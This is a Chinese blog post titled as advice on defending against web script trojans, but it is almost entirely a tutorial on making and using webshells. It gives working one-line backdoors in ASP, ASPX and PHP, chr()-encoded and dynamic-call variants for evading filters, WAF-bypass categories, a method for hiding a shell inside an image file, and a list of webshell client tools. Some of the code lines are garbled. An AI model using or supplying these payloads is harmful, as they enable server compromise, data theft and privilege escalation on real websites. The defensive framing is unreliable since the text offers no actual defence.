web安全中脚本木马如何防御

这篇文章给大家分享的是有关web安全中脚本木马如何防御的内容。小编觉得挺实用的,因此分享给大家做个参考,一起跟随小编过来看看吧。

脚本木马的制作原理

webshell就是一种网页后门(web后门)

webshell制作原理
webshell使用技巧
webshell"黑吃黑"

一. webshell制作原理

一句话木马(2010年出来)--> 上传大马进行提权
小马                --> 上传大马进行提权
大马
打包马
脱裤马
执行命令马

GetShell就是拿webshell的动作

1. 一句话木马

一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用

asp : 
<% execute request("value") %>
<%eval request ("pass")%>
--------------------------------------
sms2056.com/x.asp?value="cmd"
aspx : 
<%@ Page Language="Jscript"%>
<%eval(Request.I tem["pass"]," uns afe");%>
PHP : 
<?php @eval($_POST['attack']) ?>

2. 工作原理

黑客在注册信息的电子邮箱或个人主页等中插入类似如下代码:

<%eval request ("pass")%>

其中pass是值,所以你可以更改自己的值,前面的request就是获取这个值

上述代码现在比较多见,而且字符数少,对表单字数有限制的地方特别的实用

当知道了数据库的URL,就可以利用本地一张网页进行连接得到WebShell(不知道数据库也可以,只要知道一句话木马的文件被插入到那一个ASP文件里面就可以了)

一句话木马是基于B/S结构的

3. 一句话木马变形

<?php $_GET['a']($_POST['b']) ?>
---------------------------------------
x.php?a=eval&b="cmd"
<%Eval (Request(chr(112)))%>
---------------------------------------
aspcms2.0以上会检查脚本中的双引号""",单引号"'"
<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("pass"))%>
<% a=%request("gold") %><%eval %a%>

4. 一般WAF绕过方式

函数绕过
编码绕过
可变变量绕过
动态获取参数绕过

5. 一句话图片马的制作

C32下做一句话
打开c32, 把图片放里面,写入一句话保存,退出
cmd下做一句话
copy /b 1.jpg+1.asp 2.jpg
win7下右键图片,在属性 -> 详细信息 -> 版权内插入一句话即可

6. 常见的一句话客户端

中国菜刀
中国砍刀
蚁剑
C刀
lanker一句话客户端
ZV新型PHP一句话木马客户端GUI版
一句话客户端增强版

7. 大马

大马体积比较大,一般50kb以上.功能也多,一般都包含提权命令,磁盘管理,数据库连接接口,执行命令甚至有些以具备自带提权功能和压缩,解压缩网站程序的功能.这种马隐蔽性不好,而大多代码如不加密的话很多杀毒厂商开始追杀此类程序 .

用途 : 
提权
打包
脱裤
增删文件

8. 小马

作用主要用户上传大马

二. webshell使用技巧

内容编码
配合解析漏洞
配合文件包含
利用文件名溢出

三. webshell"黑吃黑"

http://xss.fbisb.com/xss.php?do=login

1. 找shell后门

查找后门
查找webshell后门
找到后门地址
反搞wehshell箱子

2. 找一句话客户端后门

查找客户端后门
找到后门地址
反搞wehshell箱子

感谢各位的阅读!关于“web安全中脚本木马如何防御”这篇文章就分享到这里了,希望以上内容可以对大家有一定的帮助,让大家可以学到更多知识,如果觉得文章不错,可以把它分享出去让更多的人看到吧!

原创文章,作者:506227337,如若转载,请注明出处:https://blog.ytso.com/222401.html

(0)
上一篇 2022年1月6日
下一篇 2022年1月6日

相关推荐

发表回复

登录后才能评论